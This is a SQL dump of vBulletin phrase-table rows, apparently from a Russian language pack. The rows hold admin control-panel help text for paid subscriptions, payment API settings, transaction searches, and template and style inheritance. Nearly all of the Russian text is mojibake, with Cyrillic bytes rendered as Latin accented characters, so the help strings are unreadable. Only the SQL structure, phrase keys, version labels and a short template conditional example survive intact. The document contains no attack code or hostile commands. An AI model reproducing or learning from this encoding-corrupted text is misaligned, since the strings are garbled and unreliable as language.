(23990, -1, 'subscriptions_apiadd_apiedit_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå ñèñòåìû îïëà òû. Èñïîëüçóåòñÿ òîëüêî â êà ÷åñòâå Ãà èìåÃîâà Ãèÿ.', 'vbulletin', '', 0, ''),
(23991, -1, 'subscriptions_apiadd_apiedit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(23992, -1, 'subscriptions_apiadd_apiedit_active_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò âà ì âêëþ÷èòü/âûêëþ÷èòü äà ÃÃóþ ñèñòåìó îïëà òû áåç óäà ëåÃèÿ è ñîçäà Ãèÿ îÃîé. Åñëè ñèñòåìà îïëà òû âûêëþ÷åÃà , òî îÃà ÃÃ¥ áóäåò äîñòóïÃà äëÿ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23993, -1, 'subscriptions_apiadd_apiedit_active_title', 'cphelptext', 'Âêëþ÷åÃ', 'vbulletin', '', 0, ''),
(23994, -1, 'subscriptions_apiadd_apiedit_classname_text', 'cphelptext', 'Äà ÃÃîå èìÿ áóäåò èñïîëüçîâà òüñÿ äëÿ ñîçäà Ãèÿ è ïîñëåäóþùåãî âûçîâà ôà éëà êëà ññà ñèñòåìû ïëà òåæåé. Ãîñìîòðèòå ôà éëû êëà ññîâ â äèðåêòîðèè includes/paymentapi . Ãà ïðèìåð, åñëè èìÿ êëà ññà \"wm\", òî êëà ññ áóäåò ðà ñïîëîæåà çäåñü: includes/paymentapi/class_wm.php ', 'vbulletin', '', 0, ''),
(23995, -1, 'subscriptions_apiadd_apiedit_classname_title', 'cphelptext', 'Ãà çâà Ãèå êëà ññà ', 'vbulletin', '', 0, ''),
(23996, -1, 'subscriptions_apiadd_apiedit_currency_text', 'cphelptext', 'Çäåñü óêà çûâà þòñÿ ïîääåðæèâà åìûå âà ëþòû ñ ïîìîùüþ à ááðåâèà òóð, ðà çäåëÿåìûõ çà ïÿòûìè. Ñïèñîê îáîçÃà ÷åÃèé äîñòóïåà Ãà ýòîì ñà éòå . \r\n\r\nÃà ïðèìåð, åñëè âû æåëà åòå ïðèÃèìà òü äîëëà ðû ÑØÀ, åâðî è ðóáëè, òî â ýòî ïîëå ñëåäóåò ââåñòè: \r\n\r\nusd,eur,rub ', 'vbulletin', '', 0, ''),
(23997, -1, 'subscriptions_apiadd_apiedit_currency_title', 'cphelptext', 'Ãîääåðæèâà åìà ÿ âà ëþòà ', 'vbulletin', '', 0, ''),
(23998, -1, 'subscriptions_apiadd_apiedit_recurring_text', 'cphelptext', 'Ñèñòåìà ïëà òåæåé ïîääåðæèâà åò âîçâðà ò ïëà òåæà ?', 'vbulletin', '', 0, ''),
(23999, -1, 'subscriptions_apiadd_apiedit_recurring_title', 'cphelptext', 'Ãîääåðæêà âîçâðà òà ïëà òåæà ', 'vbulletin', '', 0, ''),
(24000, -1, 'subscriptions_apiedit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì îòðåäà êòèðîâà òü ñóùåñòâóþùèé ñïîñîá îïëà òû. Ãà ðà ìåòðû ðåäà êòèðîâà Ãèÿ îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(24001, -1, 'subscriptions_apiedit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ñïîñîáà ', 'vbulletin', '', 0, ''),
(24002, -1, 'subscriptions_apirem_text', 'cphelptext', 'Ãòà ñòðà Ãèöà - ïîäòâåðæäåÃèå óäà ëåÃèÿ âûáðà ÃÃîãî ñïîñîáà îïëà òû. Äåéñòâèå ÃÃ¥ ìîæåò áûòü îòìåÃÃ¥Ãî.', 'vbulletin', '', 0, ''),
(24003, -1, 'subscriptions_apirem_title', 'cphelptext', 'Óäà ëåÃèå ñïîñîáà ', 'vbulletin', '', 0, ''),
(24004, -1, 'subscriptions_edit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì îòðåäà êòèðîâà òü ýòó ïîäïèñêó. Åñëè ó âà ñ åñòü âîïðîñû ïî îïöèÿì Ãèæå, òî èçó÷èòå ñîîòâåòñòâóþùèå ñïðà âî÷Ãûå ñòà òüè. \r\n\r\nÅñëè âû æåëà åòå èñïîëüçîâà òü ýòó ïîäïèñêó äëÿ óïðà âëåÃèÿ ìà ñêà ìè äîñòóïà ïîëüçîâà òåëåé, òî óáåäèòåñü, ÷òî ìà ñêè äîñòóïà âêëþ÷åÃû â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24005, -1, 'subscriptions_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ïîäïèñêè', 'vbulletin', '', 0, ''),
(24006, -1, 'subscriptions_find_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ñïèñîê ïîëüçîâà òåëåé, ïîäïèñà ÃÃûõ Ãà ýòó ïîäïèñêó. Ãà æìèòå ñïðà âà êÃîïêó \"Ãåäà êòèðîâà òü\", ÷òîáû îòðåäà êòèðîâà òü ñîîòâåòñòâóþùóþ ïîäïèñêó. \r\n\r\nÊîëîÃêà \"Ãà çâà Ãèå\" îòîáðà æà åò Ãà çâà Ãèå ïîäïèñêè äëÿ ñîîòâåòñòâóþùåé çà ïèñè. \r\n\r\nÊîëîÃêà \"Èìÿ ïîëüçîâà òåëÿ\" îòîáðà æà åò ïîëüçîâà òåëåé, ïîäïèñà ÃÃûõ Ãà ñîîòâåòñòâóþùóþ ïîäïèñêó. Âû ìîæåòå Ãà æà òü Ãà èìÿ ïîëüçîâà òåëÿ, ÷òîáû ïðîñìîòðåòü åãî ïðîôèëü. \r\n\r\nÊîëîÃêà \"Äà òà Ãà ÷à ëà \" îòîáðà æà åò äà òó ïîäïèñà Ãèÿ. Åñëè âðåìÿ, ïðîøåäøåå ñ äà òû Ãà ÷à ëà , áîëüøå ïðîäîëæèòåëüÃîñòè ïîäïèñêè, ÷òî â êîëîÃêå \"Ñòà òóñ\" áóäåò Ãà ïèñà Ãî \"Âûêëþ÷åÃà \".  ïðîòèâÃîì ñëó÷à å - \"ÀêòèâÃà ÿ\"', 'vbulletin', '', 0, ''),
(24007, -1, 'subscriptions_find_title', 'cphelptext', 'Ãîêà çà òü ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24008, -1, 'subscriptions_modify_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ñïèñîê ñóùåñòâóþùèõ ïîäïèñîê (åñëè åñòü). ÊîëîÃêà \"Ãà çâà Ãèå\" îòîáðà æà åò Ãà çâà Ãèå ñîîòâåòñòâóþùåé ïîäïèñêè. Ãà çâà Ãèå èñïîëüçóåòñÿ äëÿ èäåÃòèôèêà öèè ïîäïèñêè äëÿ âà øèõ ïîëüçîâà òåëåé Ãà âà øåì ôîðóìå è â ýòîì óïðà âëåÃèè ïîäïèñêà ìè. \r\n\r\nÊîëîÃêà \"Ñòîèìîñòü\" ñîäåðæèò ñòîèìîñòü ñîîòâåòñòâóþùèõ ïîäïèñîê äëÿ âñåõ ïîääåðæèâà åìûõ âà ëþò. \r\n\r\nÊîëîÃêà \"ÀêòèâÃî\" îòîáðà æà åò âà ì êîëè÷åñòâî à êòèâÃûõ ïîäïèñîê äëÿ ñîîòâåòñòâóþùåé ïîäïèñêè. ÀêòèâÃûå ïîäïèñêè - òå, êîòîðûå áûëè ïîäïèñà Ãû ÃÃ¥ ïîçäÃåå ïðîäîëæèòåëüÃîñòè ïîäïèñêè. \r\n\r\nÊîëîÃêà \"Çà âåðøåÃî\" îòîáðà æà åò êîëè÷åñòâî Ãåà êòèâÃûõ ïîäïèñîê. Ãåà êòèâÃûå ïîäïèñêè - òå, êîòîðûå áûëè ïîäïèñà Ãû ïîçäÃåå ïðîäîëæèòåëüÃîñòè ïîäïèñêè. \r\n\r\nÊîëîÃêà \"Âñåãî\" îòîáðà æà åò ñóììó à êòèâÃûõ è Ãåà êòèâÃûõ ïîäïèñîê äëÿ ñîîòâåòñòâóþùåé ïîäïèñêè. \r\n\r\nÊîëîÃêà \"Óïðà âëåÃèå\" ñîäåðæèò îïöèè äëÿ êà æäîé ïîäïèñêè. Îïöèÿ \"Ãåäà êòèðîâà òü\" ïîçâîëÿåò âà ì îòðåäà êòèðîâà òü Ãà ñòðîéêè äëÿ ïîäïèñêè, âêëþ÷à ÿ: Ãà çâà Ãèå, îïèñà Ãèå, ñòîèìîñòü, ãðóïïû ó÷à ñòÃèêîâ è ìà ñêè äîñòóïà . Îïöèÿ \"Óäà ëèòü\" óäà ëÿåò ïîäïèñêó. Îïöèÿ \"Ãðîñìîòð ïîëüçîâà òåëåé\" îòîáðà æà åò âà ì âñåõ ïîëüçîâà òåëåé, ïîäïèñà ÃÃûõ Ãà ýòó ïîäïèñêó, ñ óêà çà Ãèåì à êòèâÃà èõ ïîäïèñêà èëè Ãåò. È, Ãà êîÃåö, îïöèÿ \"Äîáà âèòü ïîëüçîâà òåëÿ\" ïîçâîëÿåò âà ì ñà ìîñòîÿòåëüÃî ïîäïèñà òü ïîëüçîâà òåëÿ Ãà ñîîòâåòñòâóþùóþ ïîäïèñêó.', 'vbulletin', 'zCarot', 1207908565, '3.7.0 Release Candidate 4'),
(24009, -1, 'subscriptions_modify_title', 'cphelptext', 'Óïðà âëåÃèå ïîäïèñêà ìè', 'vbulletin', '', 0, ''),
(24010, -1, 'subscriptions_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü ýòó ïîäïèñêó. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ.', 'vbulletin', '', 0, ''),
(24011, -1, 'subscriptions_remove_title', 'cphelptext', 'Óäà ëèòü ïîäïèñêè', 'vbulletin', '', 0, ''),
(24012, -1, 'subscriptions_transactions_currency_text', 'cphelptext', 'Èñïîëüçóéòå âûïà äà þùèé ñïèñîê, ÷òîáû âûáðà òü îïðåäåë¸ÃÃóþ âà ëþòó.', 'vbulletin', 'zCarot', 1147123961, '3.6.0 Beta 1'),
(24013, -1, 'subscriptions_transactions_currency_title', 'cphelptext', 'Âà ëþòà ', 'vbulletin', 'zCarot', 1147123961, '3.6.0 Beta 1'),
(24014, -1, 'subscriptions_transactions_end_text', 'cphelptext', 'Âûáåðèòå êîÃå÷Ãóþ äà òó äëÿ çà ïðîñà . Âûáåðèòå ìåñÿö, äåÃü è ãîä. Âûáðà ÃÃûå äåÃåæÃûå ïåðåâîäû äîëæÃû áûòü ñòà ðøå ýòîé äà òû, ÷òîáû îÃè áûëè îòîáðà æåÃû â ðåçóëüòà òà õ. Âû ìîæåòå èñïîëüçîâà òü ýòîò ïà ðà ìåòð âìåñòå ñ ïà ðà ìåòðîì \"Ãà ÷à ëüÃà ÿ äà òà \", ÷òîáû çà äà òü âðåìåÃÃîé ïðîìåæóòîê.', 'vbulletin', 'zCarot', 1147123893, '3.6.0 Beta 1'),
(24015, -1, 'subscriptions_transactions_end_title', 'cphelptext', 'ÊîÃå÷Ãà ÿ äà òà ', 'vbulletin', 'zCarot', 1147123893, '3.6.0 Beta 1'),
(24016, -1, 'subscriptions_transactions_exact_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîèñê ïî Ãîìåðó äåÃåæÃîãî ïåðåâîäà áóäåò ïðîèçâîäèòüñÿ èñõîäÿ èç òî÷Ãîãî ñðà âÃÃ¥Ãèÿ. Åñëè \"Ãåò\", òî èä¸ò ÷à ñòè÷Ãîå ñðà âÃÃ¥Ãèå, Ãà ïðèìåð, ïðè ïîèñêå \"x123\" ðåçóëüòà òîì ìîæåò áûòü \"ABCx123DEF\".', 'vbulletin', 'zCarot', 1147124164, '3.6.0 Beta 1'),
(24017, -1, 'subscriptions_transactions_exact_title', 'cphelptext', 'Òî÷Ãîå ñîîòâåòñòâèå', 'vbulletin', 'zCarot', 1147124164, '3.6.0 Beta 1'),
(24018, -1, 'subscriptions_transactions_orderby_text', 'cphelptext', 'Óêà æèòå ñïîñîá ñîðòèðîâêè. Âû òà êæå ñìîæåòå èçìåÃèòü ñïîñîá ñîðòèðîâêè, Ãà æà â Ãà Ãà çâà Ãèÿ êîëîÃîê ïðè ïðîñìîòðå ðåçóëüòà òîâ.', 'vbulletin', 'zCarot', 1147124032, '3.6.0 Beta 1'),
(24019, -1, 'subscriptions_transactions_orderby_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', 'zCarot', 1147124032, '3.6.0 Beta 1'),
(24020, -1, 'subscriptions_transactions_paymentapiid_text', 'cphelptext', 'Óêà æèòå çäåñü ñèñòåìó ïëà òåæåé, ÷åðåç êîòîðóþ ïðîèçâîäèëèñü îïåðà öèè.', 'vbulletin', 'zCarot', 1147123941, '3.6.0 Beta 1'),
(24021, -1, 'subscriptions_transactions_paymentapiid_title', 'cphelptext', 'Ìåòîä', 'vbulletin', 'zCarot', 1147123941, '3.6.0 Beta 1'),
(24022, -1, 'subscriptions_transactions_scope_text', 'cphelptext', 'Âûáåðèòå âðåìåÃÃîé ïðîìåæóòîê, äåéñòâèÿ â òå÷åÃèè êîòîðîãî âû æåëà åòå óâèäåòü â ðåçóëüòà òå. \"Çà äåÃü\" îòîáðà çèò âñå äåÃåæÃûå ïåðåâîäû, êîòîðûå ïðîøëè çà îäèà äåÃü. \"Çà Ãåäåëþ\" îòîáðà çèò âñå äåÃåæÃûå ïåðåâîäû, ïðîøåäøèå çà Ãåäåëþ. \"Çà ìåñÿö\" îòîáðà çèò âñå äåÃåæÃûå ïåðåâîäû, êîòîðûå ïðîøëè çà ìåñÿö.', 'vbulletin', 'zCarot', 1147124266, '3.6.0 Beta 1'),
(24023, -1, 'subscriptions_transactions_scope_title', 'cphelptext', 'Ãîêà çà òü', 'vbulletin', 'zCarot', 1147124266, '3.6.0 Beta 1'),
(24024, -1, 'subscriptions_transactions_start_text', 'cphelptext', 'Âûáåðèòå Ãà ÷à ëüÃóþ äà òó äëÿ çà ïðîñà . Âûáåðèòå ìåñÿö, äåÃü è ãîä. Âûáðà ÃÃûå äåÃåæÃûå ïåðåâîäû äîëæÃû áûòü Ãîâåå ýòîé äà òû, ÷òîáû îÃè áûëè îòîáðà æåÃû â ðåçóëüòà òà õ.', 'vbulletin', 'zCarot', 1147123869, '3.6.0 Beta 1'),
(24025, -1, 'subscriptions_transactions_start_title', 'cphelptext', 'Ãà ÷à ëüÃà ÿ äà òà ', 'vbulletin', 'zCarot', 1147123869, '3.6.0 Beta 1'),
(24026, -1, 'subscriptions_transactions_state_text', 'cphelptext', 'Óêà æèòå çäåñü ðåçóëüòà ò îïåðà öèè: Ãåóäà ÷Ãûå, óäà ÷Ãûå è âîçâðà ò äåÃåã.', 'vbulletin', 'zCarot', 1147123981, '3.6.0 Beta 1'),
(24027, -1, 'subscriptions_transactions_state_title', 'cphelptext', 'Òèï', 'vbulletin', 'zCarot', 1147123981, '3.6.0 Beta 1'),
(24028, -1, 'subscriptions_transactions_subscriptionid_text', 'cphelptext', 'Óêà æèòå çäåñü ïîäïèñêó, çà êîòîðóþ ïðîèçâîäèëèñü îïåðà öèè.', 'vbulletin', 'zCarot', 1147123923, '3.6.0 Beta 1'),
(24029, -1, 'subscriptions_transactions_subscriptionid_title', 'cphelptext', 'Ãîäïèñêè', 'vbulletin', 'zCarot', 1147123923, '3.6.0 Beta 1'),
(24030, -1, 'subscriptions_transactions_transactionid_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð èñïîëüçóåòñÿ äëÿ ïîèñêà îïðåäåë¸ÃÃîãî Ãîìåðà äåÃåæÃîãî ïåðåâîäà . Ãîìåð äåÃåæÃîãî ïåðåâîäà ýòî Ãîìåð, êîòîðûé ïðèñâà èâà åòñÿ äåÃåæÃîé îïåðà öèè ñèñòåìîé ïëà òåæåé. Ãòîò Ãîìåð îáû÷Ãî âêëþ÷à åòñÿ â êà æäîå ýëåêòðîÃÃîå ïèñüìî, îòïðà âëÿåìîå ñèñòåìîé ïëà òåæåé, à òà êæå ñîõðà Ãÿåòñÿ â öåÃòðå à äìèÃèñòðèðîâà Ãèÿ ïëà òåæåé.', 'vbulletin', 'zCarot', 1147124099, '3.6.0 Beta 1'),
(24031, -1, 'subscriptions_transactions_transactionid_title', 'cphelptext', 'Ãîìåð äåÃåæÃîãî ïåðåâîäà ', 'vbulletin', 'zCarot', 1147124099, '3.6.0 Beta 1'),
(24032, -1, 'subscriptions_transactions_username_text', 'cphelptext', 'Óêà æèòå çäåñü èìÿ ïîëüçîâà òåëÿ, êîòîðûé ïðîèçâîäèë îïåðà öèè.', 'vbulletin', 'zCarot', 1147123996, '3.6.0 Beta 1'),
(24033, -1, 'subscriptions_transactions_username_title', 'cphelptext', 'Èìÿ ïîëüçîâà òåëÿ', 'vbulletin', 'zCarot', 1147123996, '3.6.0 Beta 1'),
(24034, -1, 'template_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÑòèëè è øà áëîÃû \r\nÎáùèå øà áëîÃû, ïåðåìåÃÃûå ñòèëÿ è CSS \r\nÇà ìåùà åìûå ïåðåìåÃÃûå \r\n\r\nÃà ñëåäîâà Ãèå: \r\nÑòèëè ôîðóìà èñïîëüçóþò Ãà ñëåäîâà Ãèå äëÿ óïðà âëåÃèÿ øà áëîÃà ìè è Ãà ñòðîéêà ìè ñòèëåé. Ãîäñòèëü Ãà ñëåäóåò øà áëîÃû è Ãà ñòðîéêè ñâîåãî ðîäèòåëüñêîãî ñòèëÿ. Ãà ïðèìåð, åñëè øà áëîà èçìåÃåà â ðîäèòåëüñêîì ñòèëå, òî âñå ïîäñòèëè óÃà ñëåäóþò ýòîò èçìåÃÃ¥ÃÃûé øà áëîÃ. \r\n\r\nÄîïóñòèìîå ïðèìåÃÃ¥Ãèå Ãà ñëåäîâà Ãèÿ ñòèëåé âêëþ÷à åò â ñåáÿ ñîçäà Ãèå âà ðèà öèé Ãà òåìó. Äà âà éòå ïðåäñòà âèì, ÷òî ó âà ñ åñòü ñòèëü ñ èçìåÃÃ¥ÃÃûì øà áëîÃîâ, êîòîðûé çà äà ¸ò ñïåöèôè÷åñêîå îòîáðà æåÃèå ñîäåðæèìîãî âà øåãî ôîðóìà , Ãî âû æåëà åòå, ÷òîáû ïîëüçîâà òåëè ìîãëè âûáðà òü ðà çÃîîáðà çÃóþ ðà ñöâåòêó, èñïîëüçóÿ òå æå øà áëîÃû.  ýòîé ñèòóà öèè âû ìîæåòå ñîçäà òü ïîäñòèëè ñ èçìåÃÃ¥ÃÃîé Ãà ñòðîéêîé øà áëîÃîâ. Ãîäñòèëè áóäóò Ãà ñëåäîâà òü âñå èçìåÃÃ¥Ãèÿ ðîäèòåëüñêîãî ñòèëÿ, òî åñòü áóäóò èìåòü òîæå îòîáðà æåÃèå, Ãî ñ ñîáñòâåÃÃîé ðà ñöâåòêîé, êîòîðà ÿ ÃÃ¥ áóäåò Ãà ñëåäîâà òüñÿ. \r\n\r\nÑèëà Ãà ñëåäîâà Ãèÿ ìîæåò áûòü ðà ññìîòðåÃà Ãà ñëåäóþùåì ïðèìåðå: ïðè ñîçäà Ãèè âà ðèà öèé Ãà òåìó áåç Ãà ñëåäîâà Ãèÿ âà ì ïîòðåáóåòñÿ ñäåëà òü äóáëèêà òû øà áëîÃîâ äëÿ êà æäîãî ñòèëÿ, è ëþáîå èçìåÃÃ¥Ãèå øà áëîÃîâ çà ñòà âèò âà ñ èçìåÃèòü èõ âî âñåõ ñòèëÿõ, ÷òî î÷åÃü äîëãî. Ñ Ãà ñëåäîâà Ãèåì âà ì ÃóæÃî áóäåò ïðîñòî èçìåÃèòü ðîäèòåëüñêèé øà áëîÃ. \r\n\r\nÓñëîâèÿ øà áëîÃîâ: \r\nÔîðóì ïîääåðæèâà åò óñëîâèÿ â ñâîèõ øà áëîÃà õ. Óñëîâèÿ ïîçâîëÿò âà ì îòîáðà æà òü èëè ÃÃ¥ îòîáðà æà òü êîä â øà áëîÃà õ, îñÃîâûâà ÿñü Ãà óñëîâèÿõ áóëåâîé îöåÃêè ïðà âäû èëè ëæè. Âîò ïðèìåð ñèÃòà êñèñà : \r\n\r\n<if condition=\"$bbuserinfo[userid]\"> \r\nêîä, êîòîðûé îòîáðà çèòñÿ, åñëè ïîëüçîâà òåëü çà ðåãèñòðèðîâà à è âîø¸ë (ÃÃ¥ ãîñòü) \r\n<else /> \r\nêîä, êîòîðûé îòîáðà çèòñÿ, åñëè ïîëüçîâà òåëü ÃÃ¥ çà ðåãèñòðèðîâà ëñÿ èëè ÃÃ¥ âîø¸ë (ãîñòü) \r\n</if> \r\n\r\n ïðèìåðå âûøå óñëîâèå ïðîâåðÿåò, âîø¸ë èëè Ãåò çà ðåãèñòðèðîâà ÃÃûé ïîëüçîâà òåëü, ñ ïîìîùüþ ïðîâåðêè id ïîëüçîâà òåëÿ (ãîñòè èìåþò id ïîëüçîâà òåëÿ ðà âÃûé 0, ÷òî ýêâèâà ëåÃòÃî ëæè). Êîä green áóäåò âêëþ÷åà ïðè âûâîäå ñòðà Ãèöû Ãà ýêðà Ã, åñëè ïîëüçîâà òåëü âîø¸ë (óñëîâèå - ïðà âäà ). Ëèáî êîä red áóäåò âêëþ÷åÃ, åñëè ïîëüçîâà òåëü ÃÃ¥ âîø¸ë (óñëîâèå - ëîæÃî). Òåã <else /> è êîä red ÃÃ¥ îáÿçà òåëüÃû. \r\n\r\nÌà ññèâ $bbuserinfo â ïðèìåðå âûøå ñîäåðæèò â ñåáå âñþ èÃôîðìà öèþ î ïîëüçîâà òåëå, è îà ãëîáà ëåà äëÿ âñåõ øà áëîÃîâ ôîðóìà . Ìà ññèâ $vboptions òà êæå ÿâëÿåòñÿ ãëîáà ëüÃûì, îà ñîäåðæèò çÃà ÷åÃèÿ âà øèõ îïöèé ôîðóìà . Åñëè âà ì òðåáóåòñÿ ïîìîùü ïî ñîçäà Ãèþ óñëîâèé, èñïîëüçóÿ ïåðåìåÃÃûå ôîðóìà , òî ñîîáùèòå îá ýòîì Ãà ôîðóìå vBulletin.com.', 'vbulletin', 'zCarot', 1205942760, '3.7.0 Release Candidate 1'),
(24035, -1, 'template_title', 'cphelptext', 'ÃŽ ñòèëÿõ è øà áëîÃà õ', 'vbulletin', '', 0, ''),
(24036, -1, 'template_add_dostyleid_text', 'cphelptext', 'Ãòî ñïèñîê áûñòðîãî âûáîðà èç âñåõ âà øèõ óñòà ÃîâëåÃÃûõ ñòèëåé. Îà ïîçâîëÿåò âà ì áûñòðî ïåðåêëþ÷à òüñÿ ìåæäó Ãèìè. Ãðè ðåäà êòèðîâà Ãèè øà áëîÃîâ óáåäèòåñü, ÷òî îòîáðà æà åìûé çäåñü ñòèëü ñîîòâåòñòâóåò òîìó, â êîòîðîì âû æåëà åòå ñäåëà òü èçìåÃÃ¥Ãèÿ.', 'vbulletin', '', 0, ''),
(24037, -1, 'template_add_dostyleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''),
(24038, -1, 'template_add_edit_text', 'cphelptext', ' ðåäà êòîðå øà áëîÃîâ âû ìîæåòå èçìåÃÿòü øà áëîÃû, êîòîðûå èçìåÃÿò îáëèê âà øåãî ôîðóìà . Çäåñü âû èçìåÃÿåòå HTML èÃäèâèäóà ëüÃûõ øà áëîÃîâ.', 'vbulletin', '', 0, ''),
(24039, -1, 'template_add_edit_title', 'cphelptext', 'Ãåäà êòîð øà áëîÃîâ', 'vbulletin', '', 0, ''),
(24040, -1, 'template_add_edit_title_text', 'cphelptext', 'Ââåäèòå ñþäà Ãà çâà Ãèå âà øåãî øà áëîÃà . ÃŽÃî áóäåò èìåÃåì, îòçûâà þùèìñÿ ïðè âûçîâå ñèñòåìîé. ÃŽÃî óæå áóäåò óêà çà Ãî, åñëè âû ðåäà êòèðóéòå ñóùåñòâóþùèé øà áëîÃ.\r\n\r\nÃîìÃèòå: ïðè äîáà âëåÃèè äîïîëÃèòåëüÃûõ øà áëîÃîâ, âû äîëæÃû òà êæå Ãà ïèñà òü êîä PHP äëÿ èõ âûçîâà .', 'vbulletin', '', 0, ''),
(24041, -1, 'template_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(24042, -1, 'template_add_edit_template_text', 'cphelptext', 'Çäåñü âû ðåäà êòèðóéòå HTML. Ëþáîé ïðà âèëüÃûé HTML êîä äîïóñòèì çäåñü. Äëÿ òîãî, ÷òîáû óçÃà òü, êà ê èñïîëüçîâà òü HTML, ïîñåòèòå www.w3c.org.
\r\n\r\nÔîðóì òà êæå ïîääåðæèâà åò Ãåñêîëüêî ñïåöèà ëüÃûõ òåãîâ, êîòîðûå ìîãóò áûòü èñïîëüçîâà Ãû çäåñü. Çäåñü äîïóñòèìû òåãè <phrase> è <if>. Èçó÷èòå ñïðà âî÷Ãûå ñòà òüè ðà çäåëà \"ÃŽ ñòèëÿõ ôîðóìà \", Ãà æà â Ãà èçîáðà æåÃèå ñ âîïðîñîì â çà ãîëîâêå.
', 'vbulletin', '', 0, ''),
(24043, -1, 'template_add_edit_template_title', 'cphelptext', 'Øà áëîÃ', 'vbulletin', '', 0, ''),
(24044, -1, 'template_addstyle_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëèò âà ì ñîçäà òü Ãîâûé ñòèëü. Äëÿ ïîëó÷åÃèÿ ñïðà âêè ïî îïöèÿì Ãèæå, Ãà æìèòå Ãà çÃà êè âîïðîñà â çà ãîëîâêà õ îïöèé.', 'vbulletin', '', 0, ''),
(24045, -1, 'template_addstyle_title', 'cphelptext', 'Äîáà âëåÃèå ñòèëÿ', 'vbulletin', '', 0, ''),
(24046, -1, 'template_addstyle_editstyle_files_parentid_text', 'cphelptext', 'Ñ ýòîãî ñòèëÿ áóäóò Ãà ñëåäîâà òüñÿ øà áëîÃû, Ãà ñòðîéêè è ïðî÷åå. Ëþáûå èçìåÃÃ¥Ãèÿ, ñäåëà ÃÃûå â ðîäèòåëüñêîì ñòèëå, áóäóò ïðèìåÃÃ¥Ãû ê Ãà ñëåäóåìûì ñòèëÿì.', 'vbulletin', '', 0, ''),
(24047, -1, 'template_addstyle_editstyle_files_parentid_title', 'cphelptext', 'Ãîäèòåëüñêèé ñòèëü', 'vbulletin', '', 0, ''),
(24048, -1, 'template_addstyle_editstyle_files_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå ñòèëÿ. Ãà çâà Ãèå èñïîëüçóåòñÿ äëÿ èäåÃòèôèêà öèè ñòèëÿ â óïðà âëåÃèè ñòèëÿìè â ïà Ãåëè à äìèÃèñòðà òîðà è ïðè âûáîðå ñòèëåé â ëåâîì ÃèæÃåì óãëó âà øåãî ôîðóìà .', 'vbulletin', '', 0, ''),
(24049, -1, 'template_addstyle_editstyle_files_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(24050, -1, 'template_addstyle_editstyle_files_userselect_text', 'cphelptext', 'Âêëþ÷èâ ýòó îïöèþ, âû ðà çðåøèòå ïîëüçîâà òåëÿì âûáèðà òü ýòîò ñòèëü äëÿ èñïîëüçîâà Ãèÿ Ãà âà øåì ôîðóìå.', 'vbulletin', '', 0, ''),
(24051, -1, 'template_addstyle_editstyle_files_userselect_title', 'cphelptext', 'Ãà çðåøèòü âûáîð ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24052, -1, 'template_addstyle_editstyle_files_displayorder_text', 'cphelptext', 'Ãòî ïîðÿäîê îòîáðà æåÃèÿ, èñïîëüçóåìûé äëÿ ñîðòèðîâêè ñïèñêà ñòèëåé Ãà ýòîì óðîâÃÃ¥ ñòèëåé â óïðà âëåÃèè ñòèëÿìè â ïà Ãåëè à äìèÃèñòðà òîðà è ïðè âûáîðå ñòèëåé â ëåâîì ÃèæÃåì óãëó âà øåãî ôîðóìà . \r\n\r\nÃà ïðèìåð, âîò òà êîå äåðåâî ñòèëåé áóäåò èìåòü ñëåäóþùèé ïîðÿäîê îòîáðà æåÃèÿ: \r\n\r\nÎÑÃÎÂÃÎÉ ÑÒÈËÜ - 1 \r\n-- Ãîäñòèëü - 1 \r\n-- Äðóãîé ïîäñòèëü - 2 \r\n---- Ãîä-ïîäñòèëü - 1 \r\n---- Äðóãîé ïîä-ïîäñòèëü - 2 \r\n-- Åù¸ ïîäñòèëü - 3', 'vbulletin', '', 0, ''),
(24053, -1, 'template_addstyle_editstyle_files_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(24054, -1, 'template_delete_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì âîçâðà òèòü øà áëîà ê îáû÷Ãîìó çÃà ÷åÃèþ. Åñëè øà áëîà ÿâëÿåòñÿ ÷à ñòüþ ðîäèòåëüñêîãî ñòèëÿ, òî øà áëîÃû ïîäñòèëåé òà êæå âîçâðà òÿò çÃà ÷åÃèå îáû÷Ãîãî øà áëîÃà . Ãîäñòèëè Ãà ñëåäóþò äîïîëÃèòåëüÃûå øà áëîÃû ðîäèòåëüñêèõ ñòèëåé.', 'vbulletin', '', 0, ''),
(24055, -1, 'template_delete_title', 'cphelptext', 'Óäà ëåÃèå øà áëîÃà ', 'vbulletin', '', 0, ''),
(24056, -1, 'template_deletestyle_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì óäà ëèòü ýòîò ñòèëü. Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ. Âîññòà ÃîâëåÃèå ÃåâîçìîæÃî!', 'vbulletin', '', 0, ''),
